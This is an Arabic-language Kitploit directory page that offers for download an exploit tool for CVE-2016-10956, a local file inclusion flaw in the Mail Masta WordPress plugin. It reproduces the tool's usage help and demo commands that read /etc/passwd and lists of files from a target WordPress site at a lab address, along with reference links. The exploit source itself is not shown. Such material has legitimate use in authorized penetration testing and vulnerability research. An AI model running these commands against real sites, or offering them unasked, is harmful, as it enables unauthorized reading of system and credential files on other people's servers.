Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2016-10956-mail-masta — ثغرة Local File Inclusion في إضافة wordpress MailMasta (CVE-2016-10956) | Kitploit
أدوات/GitHubGitHub/p0dalirius/cve-2016-10956-mail-masta
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتأمن الويباختبار الاختراق
GitHubp0dalirius/cve-2016-10956-mail-masta

CVE-2016-10956-mail-masta

ثغرة Local File Inclusion في إضافة wordpress MailMasta (CVE-2016-10956)

عرض المستودعالموقع الإلكتروني
21211منذ 4 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Mail Masta - قراءة ملف محلي (CVE-2016-10956)

GitHub release (latest by date) YouTube Channel Subscribers

إضافة mail-masta الإصدار 1.0 لنظام WordPress تحتوي على ثغرة قراءة ملفات محلي في count_of_send.php و csvexport.php.

الاستخدام

$ ./CVE-2016-10956_mail_masta.py -h
[+] Mail Masta - Local File Read (CVE-2016-10956)

usage: CVE-2016-10956_mail_masta.py [-h] [-v] [-s] -t TARGET_URL [-f FILE | -F FILELIST] [-D DUMP_DIR] [-k] [-r]

Description message

optional arguments:
  -h, --help            show this help message and exit
  -v, --verbose         Verbose mode
  -s, --only-success    Only print successful read file attempts.
  -t TARGET_URL, --target TARGET_URL
                        URL of the wordpress to connect to.
  -f FILE, --file FILE  Remote file to read.
  -F FILELIST, --filelist FILELIST
                        File containing a list of paths to files to read remotely.
  -D DUMP_DIR, --dump-dir DUMP_DIR
                        Directory where the dumped files will be stored.
  -k, --insecure        Allow insecure server connections when using SSL (default: False)
  -r, --raw             Raw dump of the file without php base64 wrapper (default: False)

العرض التوضيحي

قراءة ملف بعيد محدد

./CVE-2016-10956_mail_masta.py -t http://192.168.56.106/wp/ -f /etc/passwd

قراءة ملفات بعيدة محددة من قائمة كلمات

./CVE-2016-10956_mail_masta.py -t http://192.168.56.106/wp/ -F wordlist

قراءة ملفات بعيدة محددة من قائمة كلمات وطباعة الملفات المكتشفة فقط

./CVE-2016-10956_mail_masta.py -t http://192.168.56.106/wp/ -F wordlist --only-success

المراجع

  • https://nvd.nist.gov/vuln/detail/CVE-2016-10956
  • https://cxsecurity.com/issue/WLB-2016080220
  • https://wordpress.org/plugins/mail-masta/#developers
  • https://wpvulndb.com/vulnerabilities/8609
تنزيل الأداة